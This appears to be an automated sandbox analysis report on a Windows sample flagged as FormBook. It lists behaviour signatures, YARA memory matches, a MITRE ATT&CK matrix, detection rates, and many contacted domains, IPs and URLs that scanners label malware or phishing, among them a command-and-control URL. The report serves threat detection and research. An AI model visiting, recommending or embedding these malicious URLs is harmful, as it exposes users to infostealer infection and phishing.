Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Queries volume information: C:\Users\user\AppData\Roaming\tsnokiirph.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tsnokiirph.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\22#U0415.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2869863724.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1717172905.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2870656391.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1671381278.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2870381691.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1703327981.0000000005093000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2869863724.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1717172905.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2870656391.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1671381278.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2870381691.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1703327981.0000000005093000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	812 Process Injection	1 Rootkit	1 Credential API Hooking	221 Security Software Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	1 Scheduled Task/Job	1 Masquerading	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	Exfiltration Over Bluetooth	4 Ingress Tool Transfer	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Disable or Modify Tools	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	Login Hook	31 Virtualization/Sandbox Evasion	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	13 Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	812 Process Injection	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Scheduled Transfer	Fallback Channels			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Deobfuscate/Decode Files or Information	Cached Domain Credentials	112 System Information Discovery	VNC	GUI Input Capture	Data Transfer Size Limits	Multiband Communication			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	Commonly Used Port			Inhibit System Recovery	Web Services	DNS
Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	32 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Exfiltration Over Alternative Protocol	Application Layer Protocol			Defacement	Serverless	Network Trust Dependencies

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
22#U0415.exe	32%	ReversingLabs
22#U0415.exe	47%	Virustotal		Browse
22#U0415.exe	100%	Avira	HEUR/AGEN.1305634
22#U0415.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\tsnokiirph.exe	100%	Avira	HEUR/AGEN.1305634
C:\Users\user\AppData\Roaming\tsnokiirph.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\tsnokiirph.exe	32%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
www.v72999.com	0%	Virustotal	Browse
www.theanhedonia.com	0%	Virustotal	Browse
alterdpxlmarketing.com	7%	Virustotal	Browse
www.alterdpxlmarketing.com	1%	Virustotal	Browse
www.harborspringsfire.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	0%	URL Reputation	safe
https://outlook.com_	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.venitro.com	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	Avira URL Cloud	safe
http://www.venitro.comReferer:	0%	Avira URL Cloud	safe
http://www.venitro.com/gy14/www.batuoe.com	100%	Avira URL Cloud	malware
http://www.mtdiyx.xyz/gy14/	100%	Avira URL Cloud	phishing
http://www.0854n5.shop	100%	Avira URL Cloud	phishing
http://www.venitro.com	1%	Virustotal		Browse
http://www.venitro.com/gy14/www.batuoe.com	9%	Virustotal		Browse
http://www.founder.com.cn/cn/cThe	0%	Virustotal		Browse
http://www.mtdiyx.xyz/gy14/	1%	Virustotal		Browse
http://www.alterdpxlmarketing.comReferer:	0%	Avira URL Cloud	safe
http://www.artbydianayorktownva.comReferer:	0%	Avira URL Cloud	safe
http://www.tulisanemas.com/gy14/www.amiciperlacoda.com	100%	Avira URL Cloud	malware
http://www.0854n5.shop	1%	Virustotal		Browse
http://www.survivordental.comReferer:	0%	Avira URL Cloud	safe
http://www.mtdiyx.xyzReferer:	0%	Avira URL Cloud	safe
http://www.zom11.com	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	0%	Avira URL Cloud	safe
http://www.alterdpxlmarketing.com/gy14/www.yzyz841.xyz	100%	Avira URL Cloud	malware
http://www.zom11.com/gy14/www.dianetion.com	100%	Avira URL Cloud	malware
http://www.batuoe.com/gy14/	100%	Avira URL Cloud	malware
http://www.zom11.com	0%	Virustotal		Browse
http://www.zhongyicts.com.cn	0%	Virustotal		Browse
http://www.dianetion.com/gy14/www.artbydianayorktownva.com	100%	Avira URL Cloud	malware
http://www.amiciperlacoda.com	0%	Avira URL Cloud	safe
http://www.zom11.com/gy14/www.dianetion.com	2%	Virustotal		Browse
http://www.batuoe.com/gy14/www.zezfhys.com	100%	Avira URL Cloud	malware
http://www.0854n5.shop/gy14/	100%	Avira URL Cloud	malware
http://www.batuoe.com/gy14/	1%	Virustotal		Browse
http://www.tulisanemas.com/gy14/	100%	Avira URL Cloud	malware
http://www.artbydianayorktownva.com/gy14/www.survivordental.com	100%	Avira URL Cloud	malware
http://www.theanhedonia.com/gy14/	100%	Avira URL Cloud	malware
http://www.zezfhys.comReferer:	0%	Avira URL Cloud	safe
http://www.zezfhys.com	0%	Avira URL Cloud	safe
http://www.amiciperlacoda.com	1%	Virustotal		Browse
http://www.0854n5.shop/gy14/	2%	Virustotal		Browse
http://www.yzyz841.xyz/gy14/	100%	Avira URL Cloud	phishing
http://www.yzyz841.xyz	100%	Avira URL Cloud	phishing
http://www.v72999.comReferer:	0%	Avira URL Cloud	safe
http://www.zezfhys.com	0%	Virustotal		Browse
http://www.harborspringsfire.com/gy14/	100%	Avira URL Cloud	malware
http://www.mtdiyx.xyz	0%	Avira URL Cloud	safe
http://www.tulisanemas.com/gy14/	2%	Virustotal		Browse
http://www.mtdiyx.xyz/gy14/www.theanhedonia.com	100%	Avira URL Cloud	phishing
http://www.theanhedonia.com/gy14/	2%	Virustotal		Browse
http://www.v72999.com/gy14/www.mtdiyx.xyz	100%	Avira URL Cloud	malware
http://www.yzyz841.xyz/gy14/	3%	Virustotal		Browse
http://www.alterdpxlmarketing.com	0%	Avira URL Cloud	safe
http://www.yzyz841.xyz	0%	Virustotal		Browse
http://www.venitro.com/gy14/	100%	Avira URL Cloud	malware
http://www.amiciperlacoda.com/gy14/	100%	Avira URL Cloud	phishing
http://www.dianetion.comReferer:	0%	Avira URL Cloud	safe
http://www.alterdpxlmarketing.com	1%	Virustotal		Browse
http://www.batuoe.comReferer:	0%	Avira URL Cloud	safe
http://www.amiciperlacoda.com/gy14/	3%	Virustotal		Browse
http://www.v72999.com/gy14/www.mtdiyx.xyz	2%	Virustotal		Browse
http://www.harborspringsfire.comReferer:	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	Avira URL Cloud	safe
http://www.venitro.com/gy14/	8%	Virustotal		Browse
http://www.v72999.com	0%	Avira URL Cloud	safe
http://www.mtdiyx.xyz	0%	Virustotal		Browse
http://www.survivordental.com/gy14/	100%	Avira URL Cloud	malware
http://www.zom11.com/gy14/	100%	Avira URL Cloud	malware
http://www.artbydianayorktownva.com	0%	Avira URL Cloud	safe
http://www.zom11.comReferer:	0%	Avira URL Cloud	safe
http://www.survivordental.com/gy14/www.tulisanemas.com	100%	Avira URL Cloud	malware
http://www.mtdiyx.xyz/gy14/www.theanhedonia.com	2%	Virustotal		Browse
http://www.alterdpxlmarketing.com/gy14/?8pB8=qN98lNP8T4bXSv70&NBZlJ=J9/jgP9Re4KtuF0AsBPpjtalVscOAyQ/qvU9Qh627akK0Y3++VNxqCagaMddKEOxon78	100%	Avira URL Cloud	malware
http://www.theanhedonia.com	0%	Avira URL Cloud	safe
http://www.batuoe.com	0%	Avira URL Cloud	safe
http://www.tulisanemas.com	0%	Avira URL Cloud	safe
http://tempuri.org/QLTLDataSet.xsd	0%	Avira URL Cloud	safe
http://www.zezfhys.com/gy14/www.zom11.com	100%	Avira URL Cloud	malware
http://www.v72999.com/gy14/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.v72999.com	23.80.45.39	true	true	0%, Virustotal, Browse	unknown
www.theanhedonia.com	103.224.212.212	true	true	0%, Virustotal, Browse	unknown
alterdpxlmarketing.com	15.197.142.173	true	true	7%, Virustotal, Browse	unknown
www.alterdpxlmarketing.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.harborspringsfire.com	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.alterdpxlmarketing.com/gy14/?8pB8=qN98lNP8T4bXSv70&NBZlJ=J9/jgP9Re4KtuF0AsBPpjtalVscOAyQ/qvU9Qh627akK0Y3++VNxqCagaMddKEOxon78	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000007.00000002.2873939169.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.venitro.com/gy14/www.batuoe.com	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	9%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000007.00000000.1656778904.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2877317802.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers	22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.venitro.com	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000007.00000000.1661162254.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2882270142.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.mtdiyx.xyz/gy14/	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.venitro.comReferer:	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.0854n5.shop	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.alterdpxlmarketing.comReferer:	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tulisanemas.com/gy14/www.amiciperlacoda.com	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000007.00000002.2873939169.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.artbydianayorktownva.comReferer:	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.survivordental.comReferer:	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mtdiyx.xyzReferer:	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zom11.com	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000007.00000000.1661162254.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2882270142.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	22#U0415.exe, 00000000.00000002.1670630043.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, tsnokiirph.exe, 00000008.00000002.1701973301.0000000003645000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.alterdpxlmarketing.com/gy14/www.yzyz841.xyz	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.zom11.com/gy14/www.dianetion.com	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.batuoe.com/gy14/	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000007.00000002.2882270142.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1661162254.000000000C964000.00000004.00000001.00020000.00000000.sdmp	false		high
https://wns.windows.com/L	explorer.exe, 00000007.00000002.2882270142.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1661162254.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false		high
https://word.office.com	explorer.exe, 00000007.00000000.1661162254.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2882270142.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.dianetion.com/gy14/www.artbydianayorktownva.com	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.amiciperlacoda.com	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.batuoe.com/gy14/www.zezfhys.com	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000007.00000002.2873939169.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.0854n5.shop/gy14/	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.tulisanemas.com/gy14/	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.artbydianayorktownva.com/gy14/www.survivordental.com	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.theanhedonia.com/gy14/	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.zezfhys.comReferer:	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zezfhys.com	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.yzyz841.xyz	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://www.yzyz841.xyz/gy14/	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.v72999.comReferer:	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.harborspringsfire.com/gy14/	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000007.00000000.1661162254.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2882270142.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.mtdiyx.xyz	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.mtdiyx.xyz/gy14/www.theanhedonia.com	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://www.v72999.com/gy14/www.mtdiyx.xyz	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.alterdpxlmarketing.com	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000007.00000002.2873939169.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.venitro.com/gy14/	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	8%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://outlook.com_	explorer.exe, 00000007.00000000.1661162254.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2882270142.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	low
http://www.amiciperlacoda.com/gy14/	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
